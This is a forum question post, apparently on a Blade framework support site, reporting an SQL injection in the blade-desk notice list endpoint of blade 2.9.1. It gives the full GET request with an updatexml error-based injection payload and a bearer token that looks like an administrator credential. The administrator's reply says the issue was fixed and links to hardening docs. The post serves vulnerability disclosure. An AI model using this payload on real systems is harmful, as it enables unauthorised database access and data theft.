blade-desk-notice-list-sql注入漏洞

Blade 未结

关注

 1  548

280981330 2024-06-27 10:21

一、该问题的重现步骤是什么？

1. 公安漏洞扫描漏洞

获取数据库数据:

GET /api/blade-desk/notice/list?updatexml(1,concat(0x5c,md5(123456),0x5c),1)=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows N'T 10.0; Win64; x64) AppleWebKit537.36 (KHTML, like Gecko) Chrome/70.0.3538.77Safari/537.36

Blade-Auth: bearereyihb GciOiUzllNilslnRscCl6lkpxvcJ9.eyJ0ZWShbnRfaWOiOiIwMDAWMDAiLCJ1c2Vyx2shbwUioihzGlpbilsinlywxibmFtZS16lueuoeeQhuWRmCIsImFldGhycml0aWybWluaXN0cmF0b3liXSwiY2xpZW50X2lkIioic2FiZXIiLCJyb2xlX25hbwUiOiJhZGlpbmlzdHJhdG9yliwibGliZW5zZSI6InBvd2ZWOgYnkgYmxhZGV4liwicG9zdF9pZCI6IExMjM1OTg4MTC3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTCZODY3NTIwMSIsInJybGVfWOiOiIxMTIzNTK4ODE2NzM4Nic1MiAxlivic2NvcGUiOlsiYWxsll0sIm5pY2tfbmFtZSl6luueuoeeOhuWRmCIsIm9hdXRoX2lkljoiliwiZGV0YWlsIip7InR5cGUiOi3ZWlifSwiYWNjb3VudCl6lmFkbWluIn0.RtS67Tmbo7yFKHyMz bMQw7dfgNjxZW47KtnFcwItxQ

二、你期待的结果是什么？实际看到的又是什么？

三、你正在使用的是什么产品，什么版本？在什么操作系统上？

服务器系统：centerOS7.8 blade2.9.1

四、请提供详细的错误堆栈信息，这很重要。

五、若有更多详细信息，请在下面提供。

1条回答

admin (楼主)

2024-06-27 10:38

这问题去年就解决了，注意多看公告，具体操作看这个，其他的章节也都操作一遍：https://www.kancloud.cn/smallchill/blade-safety/3234106

0 讨论(0)
发布评论:

提交评论
- 加载中...